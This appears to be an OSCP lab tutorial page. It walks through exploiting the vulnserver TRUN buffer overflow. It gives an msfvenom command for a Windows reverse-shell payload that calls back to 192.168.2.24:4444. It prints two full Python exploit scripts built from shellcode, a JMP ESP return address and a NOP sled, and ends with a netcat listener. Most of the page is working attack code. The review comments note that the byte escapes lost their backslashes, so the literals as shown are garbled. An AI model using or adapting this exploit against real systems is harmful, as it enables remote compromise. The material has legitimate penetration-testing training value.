OSCP Security Technology - Modifying Shellcode
Generate shellcode with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "x00" -v buf
buffer.py
#!/usr/bin/python
# buffer.py -- proof-of-concept for the vulnserver TRUN stack overflow
# (see the write-up linked at the end of this page).
#
# What the script does, as written: builds one oversized TRUN command,
# opens a TCP connection to host:port, sends it once and closes. Nothing is
# read back from the target.
#
# NOTE(review): `buf` is a bytes literal, but it is concatenated with str
# objects when `buffer` is assembled below. That only works under Python 2
# semantics (the shebang does not pin a version).
# NOTE(review): the "\x.." escape sequences on this page are rendered without
# their backslashes (an extraction artifact), so the literals as printed do
# not spell the byte values the comments describe.
#
# Defender note: a "TRUN /.:/" command followed by a long run of 0x41 ("A")
# is the textbook signature of this overflow; the payload's connect-back
# destination is the LHOST/LPORT given in the msfvenom comment below.
import socket
import os
import sys
# `os` and `sys` are imported but never used in this script.
# Target running vulnserver (default port 9999).
host="192.168.2.34"
port=9999
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "x00" -v buf
# 351 bytes
# Payload emitted by the msfvenom command above: a windows/shell_reverse_tcp
# stager for 192.168.2.24:4444, encoded so that 0x00 does not appear.
buf = b""
buf += b"xbbxb0xb5x1bxfbxdbxdaxd9x74x24xf4x5fx29"
buf += b"xc9xb1x52x83xefxfcx31x5fx0ex03xefxbbxf9"
buf += b"x0exf3x2cx7fxf0x0bxadxe0x78xeex9cx20x1e"
buf += b"x7bx8ex90x54x29x23x5ax38xd9xb0x2ex95xee"
buf += b"x71x84xc3xc1x82xb5x30x40x01xc4x64xa2x38"
buf += b"x07x79xa3x7dx7ax70xf1xd6xf0x27xe5x53x4c"
buf += b"xf4x8ex28x40x7cx73xf8x63xadx22x72x3ax6d"
buf += b"xc5x57x36x24xddxb4x73xfex56x0ex0fx01xbe"
buf += b"x5exf0xaexffx6ex03xaex38x48xfcxc5x30xaa"
buf += b"x81xddx87xd0x5dx6bx13x72x15xcbxffx82xfa"
buf += b"x8ax74x88xb7xd9xd2x8dx46x0dx69xa9xc3xb0"
buf += b"xbdx3bx97x96x19x67x43xb6x38xcdx22xc7x5a"
buf += b"xaex9bx6dx11x43xcfx1fx78x0cx3cx12x82xcc"
buf += b"x2ax25xf1xfexf5x9dx9dxb2x7ex38x5axb4x54"
buf += b"xfcxf4x4bx57xfdxddx8fx03xadx75x39x2cx26"
buf += b"x85xc6xf9xe9xd5x68x52x4ax85xc8x02x22xcf"
buf += b"xc6x7dx52xf0x0cx16xf9x0bxc7xd9x56x11x0f"
buf += b"xb2xa4x15x3ex1ex20xf3x2ax8ex64xacxc2x37"
buf += b"x2dx26x72xb7xfbx43xb4x33x08xb4x7bxb4x65"
buf += b"xa6xecx34x30x94xbbx4bxeexb0x20xd9x75x40"
buf += b"x2exc2x21x17x67x34x38xfdx95x6fx92xe3x67"
buf += b"xe9xddxa7xb3xcaxe0x26x31x76xc7x38x8fx77"
buf += b"x43x6cx5fx2ex1dxdax19x98xefxb4xf3x77xa6"
buf += b"x50x85xbbx79x26x8ax91x0fxc6x3bx4cx56xf9"
buf += b"xf4x18x5ex82xe8xb8xa1x59xa9xd9x43x4bxc4"
buf += b"x71xdax1ex65x1cxddxf5xaax19x5exffx52xde"
buf += b"x7ex8ax57x9ax38x67x2axb3xacx87x99xb4xe4"
# 77A373CD FFE4 JMP ESP
# Request layout: command prefix, 2003 bytes of filler, the 4-byte address of
# the JMP ESP gadget named above, a 16-byte NOP sled, the payload, and "C"
# padding so the whole request is exactly 5060 bytes.
# The 2003-byte offset is presumably the distance to the saved return address
# established earlier in the exercise -- confirm against the referenced write-up.
buffer = "TRUN /.:/" + "A" * 2003 + "xcdx73xa3x77" + "x90" * 16 + buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
# Single send(); the return value is not checked, so a partial write would go
# unnoticed.
expl.send(buffer)
expl.close()
Run the script.
Modify the script, replacing the return-address bytes with "xafx11x50x62".
#!/usr/bin/python
# Second version of buffer.py. It is identical to the listing above except
# for the 4 return-address bytes spliced into `buffer` ("xafx11x50x62"
# instead of "xcdx73xa3x77").
#
# NOTE(review): `buf` is a bytes literal, but it is concatenated with str
# objects when `buffer` is assembled below; that relies on Python 2
# semantics (the shebang does not pin a version).
# NOTE(review): the "\x.." escape sequences on this page are rendered without
# their backslashes (an extraction artifact), so the literals as printed do
# not spell the byte values the comments describe.
import socket
import os
import sys
# `os` and `sys` are imported but never used in this script.
# Target running vulnserver (default port 9999).
host="192.168.2.34"
port=9999
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "x00" -v buf
# 351 bytes
# Payload emitted by the msfvenom command above: a windows/shell_reverse_tcp
# stager for 192.168.2.24:4444, encoded so that 0x00 does not appear.
buf = b""
buf += b"xbbxb0xb5x1bxfbxdbxdaxd9x74x24xf4x5fx29"
buf += b"xc9xb1x52x83xefxfcx31x5fx0ex03xefxbbxf9"
buf += b"x0exf3x2cx7fxf0x0bxadxe0x78xeex9cx20x1e"
buf += b"x7bx8ex90x54x29x23x5ax38xd9xb0x2ex95xee"
buf += b"x71x84xc3xc1x82xb5x30x40x01xc4x64xa2x38"
buf += b"x07x79xa3x7dx7ax70xf1xd6xf0x27xe5x53x4c"
buf += b"xf4x8ex28x40x7cx73xf8x63xadx22x72x3ax6d"
buf += b"xc5x57x36x24xddxb4x73xfex56x0ex0fx01xbe"
buf += b"x5exf0xaexffx6ex03xaex38x48xfcxc5x30xaa"
buf += b"x81xddx87xd0x5dx6bx13x72x15xcbxffx82xfa"
buf += b"x8ax74x88xb7xd9xd2x8dx46x0dx69xa9xc3xb0"
buf += b"xbdx3bx97x96x19x67x43xb6x38xcdx22xc7x5a"
buf += b"xaex9bx6dx11x43xcfx1fx78x0cx3cx12x82xcc"
buf += b"x2ax25xf1xfexf5x9dx9dxb2x7ex38x5axb4x54"
buf += b"xfcxf4x4bx57xfdxddx8fx03xadx75x39x2cx26"
buf += b"x85xc6xf9xe9xd5x68x52x4ax85xc8x02x22xcf"
buf += b"xc6x7dx52xf0x0cx16xf9x0bxc7xd9x56x11x0f"
buf += b"xb2xa4x15x3ex1ex20xf3x2ax8ex64xacxc2x37"
buf += b"x2dx26x72xb7xfbx43xb4x33x08xb4x7bxb4x65"
buf += b"xa6xecx34x30x94xbbx4bxeexb0x20xd9x75x40"
buf += b"x2exc2x21x17x67x34x38xfdx95x6fx92xe3x67"
buf += b"xe9xddxa7xb3xcaxe0x26x31x76xc7x38x8fx77"
buf += b"x43x6cx5fx2ex1dxdax19x98xefxb4xf3x77xa6"
buf += b"x50x85xbbx79x26x8ax91x0fxc6x3bx4cx56xf9"
buf += b"xf4x18x5ex82xe8xb8xa1x59xa9xd9x43x4bxc4"
buf += b"x71xdax1ex65x1cxddxf5xaax19x5exffx52xde"
buf += b"x7ex8ax57x9ax38x67x2axb3xacx87x99xb4xe4"
# 77A373CD FFE4 JMP ESP
# NOTE(review): the comment above still names 77A373CD, but the address bytes
# actually used in `buffer` below are different; the page does not say which
# module or address the new bytes correspond to -- update the comment when known.
# Request layout: command prefix, 2003 bytes of filler, a 4-byte return
# address, a 16-byte NOP sled, the payload, and "C" padding so the whole
# request is exactly 5060 bytes.
buffer = "TRUN /.:/" + "A" * 2003 + "xafx11x50x62" + "x90" * 16 + buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
# Single send(); the return value is not checked, so a partial write would go
# unnoticed.
expl.send(buffer)
expl.close()
nc -nvlp 4444
Refer to:
http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/